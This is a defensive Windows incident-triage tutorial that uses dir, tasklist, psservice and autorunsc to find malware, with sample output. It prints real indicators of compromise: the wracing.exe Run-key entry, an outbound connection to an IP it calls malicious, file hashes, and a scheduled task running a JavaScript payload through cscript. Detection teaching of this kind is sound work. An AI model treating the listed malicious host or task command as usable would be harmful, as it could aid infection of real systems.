Process Name      : wracing.exe
Process ID        : 1680
Protocol          : TCP
Local Port        : 1750
Local Port Name   : 
Local Address     : 192.168.200.53
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Remote Host Name  : 
State             : Established
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
Product Name      : 
-snip-

Examine Common File Locations


In terms of examining file locations, there may not be very many tools better than good old native “dir” command. The following command has been natively present in Windows since before the dawn of time, however the options may not be well known to you or your family members. Running the “dir” command with the following syntax will produce a listing that is sorted by the file creation time.

System32


Many files are located here and thus this is a common place for malware to hide among the weeds
dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output
C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010  05:48 PM           689,152 xpsp3res.dll
01/07/2010  06:02 PM    <dir>          en
01/07/2010  06:02 PM    <dir>          scripting
01/07/2010  06:02 PM    <dir>          en-us
01/07/2010  06:19 PM         1,676,288 xpssvcs.dll
01/07/2010  06:19 PM           575,488 xpsshhdr.dll
01/07/2010  06:19 PM           117,760 prntvpt.dll
01/07/2010  06:20 PM    <dir>          XPSViewer
01/07/2010  06:34 PM             2,560 xpsp4res.dll
01/07/2010  07:39 PM        25,966,024 MRT.exe
01/07/2010  07:50 PM             3,706 TZLog.log
            2009 File(s)    408,261,849 bytes
              52 Dir(s)   2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because the attacker has permission to write to these locations under the context of the user
dir /a /s /o:d /t:c “%USERPROFILE%” >> output.txt

Sample Output
dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
 Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010  07:00 PM            54,272 Set29F.tmp
01/07/2010  07:42 PM    <dir>          NDP1.1sp1-KB953297-X86
01/07/2010  07:47 PM            14,010 ASPNETSetup_00002.log
09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll
09/13/2010  09:28 PM    <dir>          plugtmp
03/23/2012  01:43 PM    <dir>          VMwareDnD
03/23/2012  02:54 PM               104 pdracing.tmp
-SNIP-

Note: The filenames above are from real malware--we did not make those up.

Investigating Persistence


Malware wants to survive a reboot, and the way this is accomplished is called a “Persistence Mechanism”. Sometimes the persistence mechanism can give away the presence of malicious software on a system. The following persistence mechanisms will be examined:
  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory

Examine Services


Examining services will leverage both native and non-native tools for analysis. The following command has been natively present in Windows for ages. This command is popular to list the started services.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Event Log
   FTP Publishing
   Help and Support
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   MSSQLSERVER
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Telephony
   Terminal Services
   VMware Tools Service
   WebClient
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Workstation
   World Wide Web Publishing

The command completed successfully.


The command below using psservice (will discuss soon) could also be used, however it is not as concise as “net start”:
psservice query -s start


You will see sample output from this very useful tool in a bit.
The following command has been natively present in Windows since XP and 2003. It will list the process name, process ID (PID), and the keyname for the service.
tasklist /svc >> output.txt


Sample Output
C:\>tasklist /svc

Image Name                   PID Services
========================= ====== ============================================
System Idle Process            0 N/A
System                         4 N/A
smss.exe                     604 N/A
csrss.exe                    652 N/A
winlogon.exe                 676 N/A
services.exe                 720 Eventlog, PlugPlay
lsass.exe                    732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe                  892 DcomLaunch, TermService
svchost.exe                  960 RpcSs
svchost.exe                 1072 Browser, CryptSvc, Dhcp, dmserver,
                                 EventSystem, helpsvc, lanmanserver,
                                 lanmanworkstation, Netman, Nla, RasMan,
                                 Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TapiSrv, TrkWks, W32Time,
                                 winmgmt, wscsvc, wuauserv
svchost.exe                 1132 Dnscache
svchost.exe                 1272 LmHosts, RemoteRegistry
explorer.exe                1408 N/A
VMwareUser.exe              1648 N/A
ctfmon.exe                  1660 N/A
wracing.exe                 1680 N/A
sqlmangr.exe                1692 N/A
svchost.exe                 1808 WebClient
inetinfo.exe                1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe                1880 MSSQLSERVER
VMwareService.exe            128 VMTools
alg.exe                     1168 ALG
cmd.exe                     1928 N/A
firefox.exe                  380 N/A
notepad.exe                 1344 N/A
tasklist.exe                1820 N/A
wmiprvse.exe                1892 N/A

The non-native tool, psservice.exe, is another tool from Mark Russinovich (of sysinternals--now Microsoft) and can be found at http://technet.microsoft.com/en-us/sysinternals/bb897542. This can be used to function as the “sc” command--however, the advantage of this tool compared to sc is that it can be run remotely using credentials other than the current user. Additionally, it easily provides the binary path and description with one query shown below:
psservice config [service name] >> output.txt

Sample Output
C:\>psservice config webclient

PsService v2.24 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: WebClient
DISPLAY_NAME: WebClient
Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these fun
ctions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

        TYPE              : 10 WIN32_OWN_PROCESS
        START_TYPE        : 2  AUTO_START
        ERROR_CONTROL     : 1  NORMAL
        BINARY_PATH_NAME  : C:\WINDOWS\System32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP  : NetworkProvider
        TAG               : 0
        DEPENDENCIES      : MRxDAV
        SERVICE_START_NAME: NT AUTHORITY\LocalService

If you would like to get all of the services, descriptions, and full paths to the binaries, omit the service name at the end. For example:
psservice config

Examine Registry Entries and the Startup Directory


In the prior article we used two native Windows binaries to investigate this data, the reg command and dir command. In this article everything can be achieved with one tool--autorunsc. This is another tool from Mark Russinovich (of sysinternals--now Microsoft). It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -l >> output.txt

Sample Output
C:\>autorunsc -l

Sysinternals Autoruns v10.06 - Autostart program viewer
Copyright (C) 2002-2010 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

-snip-

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
   putbginfo.bat.lnk
     C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\putbginfo.bat.lnk
     File not found: C:\TOOLS\bginfo\putbginfo.bat


HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   ctfmon.exe
     C:\WINDOWS\system32\ctfmon.exe
     CTF Loader
     Microsoft Corporation
     5.1.2600.5512
     c:\windows\system32\ctfmon.exe
     5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
     99cb7370f16773c8e2d0c86fe805ec638ab126e9 (SHA-1)
     5fb24fc7916a6e6b3be7d84cb1684215b266cd1495575c2e5672b8447932e5b1 (SHA-256)
   wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

With this sample output, we see that “wracing.exe” is in the “C:\Documents and Settings\Administrator\Local Settings\Temp” directory. We suggest you review the file listing of this directory, sorted by file creation time as well to see what other artifacts may be present from the same timeframe.

Malware will often modify the system security settings contained within the Registry to make removal and remediation more difficult such as disabling the firewall or antivirus and other critical system security alerting mechanisms.

The Windows Security Center settings are common targets for malware infections. They are set to allow you to be notified if something happens to your antivirus, firewall, windows updates, etc. Set with a value of “0” the “disable” is turned off – thus the feature is still active and you will be warned if your antivirus or firewall is disabled, etc. If set with a “1” then the “disable” is turned on, and the affected item will no longer report in the Windows Security Center as an item of concern if disabled.

To review the Registry run:
regedit

Common items which are disabled by malware include entries similar to those found below:

HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center
    FirstRunDisabled            REG_DWORD       0x1
    AntiVirusDisableNotify      REG_DWORD       0x0
    FirewallDisableNotify       REG_DWORD       0x0
    UpdatesDisableNotify        REG_DWORD       0x0
    AntiVirusOverride           REG_DWORD       0x0
    FirewallOverride            REG_DWORD       0x0

If these registries are loaded with a “1” then the item is disabled.

Examine Scheduled Tasks


In the prior article we used two native Windows binaries to investigate this data, the at command and schtasks command. In this article everything can be achieved with one tool--autorunsc. This is the same tool used above to check the registry entries and startup directory. It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -t >> output.txt

Sample Output
C:\Documents and Settings\Administrator>autorunsc -t

Sysinternals Autoruns v11.21 - Autostart program viewer
Copyright (C) 2002-2012 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-

This output is far superior to that of at or schtasks because it provides the full bath to the binary, arguments, as well as MD5 and SHA-1 hashes! Wow.

Initial Analysis of the Results


Analysis often takes far longer than the time required to run the commands. However, according to the sample information above, it appears that we have at least two infections on this host. The data below ties everything together.

Malicious software is present in the process list here:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687

and here:
C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

It also has a connection out to a known bad site:

Process Name      : wracing.exe
Process ID        : 1680
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe

Malicious files are present in the following directory:

C:\Documents and Settings\Administrator\Local Settings\Temp

09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll

The persistence mechanism is via the registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

There is also a second (most likely unrelated) suspicious task that runs via the scheduler:

Task Scheduler
   ezyme.job
   C:\WINDOWS\system32\csript.exe //E:javascript C:\WINDOWS\TEMP\ezmye.zbz
   C:\Windows\temp\ezmye.zbz
   aa186d30801500ca22b83c17d42ea743 (MD5)
   304b5e0352b846cce0b5403392a7c49e55f60ad1 (SHA-1)
   -snip-16:33:00, 3/23/2012

Recovery


Fortunately antivirus programs protect us from most of the threats that are out there, however the bad guys are constantly finding new ways to infect our systems with new malware. Once your system is infected, the only way to be 1000% certain you have found all of the components of the malware is to re-image your system. (Don’t just re-format the hard disk, as some malware such as TDSS is now infecting the disk boot records)

If you decide to go the route of manual cleanup, here are some helpful thoughts to speed you on your journey:

  • If you find your system is infected by the malware, first thing you want to do is to disconnect your system from the internet as quickly as possible to prevent additional malware from being placed on your system and to limit the potential data loss.
  • Make a backup. Note that some malware will also infect any USB device which is plugged in. This means that inserting a USB hard drive to perform a backup may actually infect it with an active infection component.
  • Turn off the system restore. If the malware infected any of the critical operating system areas, the system restore points may contain copies of the infection which you can inadvertently restore to operation if you recover your OS from an infected copy
    • My Computer-> Properties->click the System Restore tab-> Click to select the Turn off System Restore check box
  • Using a known clean system, change all your passwords. A common target for malware are credentials, which can then be used by the bad guys to access your accounts, perform fraudulent activities, etc.
  • Install and Scan your system with latest updated antivirus and anti-spyware software to clean the malware or spyware, be sure to configure the software to prompt you prior to taking action on any suspicious files found.
  • Reboot your system and update all the antivirus signatures and again rescan your system your system with antivirus and spyware.
  • If your system is still affected by the malware, then a running process may be infected. To solve this issue you need to live boot to a software CD such as BART PE (http://www.nu2.nu/pebuilder/ ) to prevent the process from running. Tools such as HIJACK THIS can be used to clean the system while the process is not running in order to remove the infection.


Food for Thought


If the infection is using rootkit technology, there is a better chance that either the native or non-native Windows tools will reveal that something is amiss--especially if the non-native tool uses non-Windows API calls to gather the information. If nothing shows up as indicators of compromise, but relatives are still convinced they are owned--they may have a healthy dose of paranoia. Either way, they may have to take it in to a shop or wait until the next holiday gathering when you have your fingers on the keyboard for a more in-depth analysis. As always, happy hunting!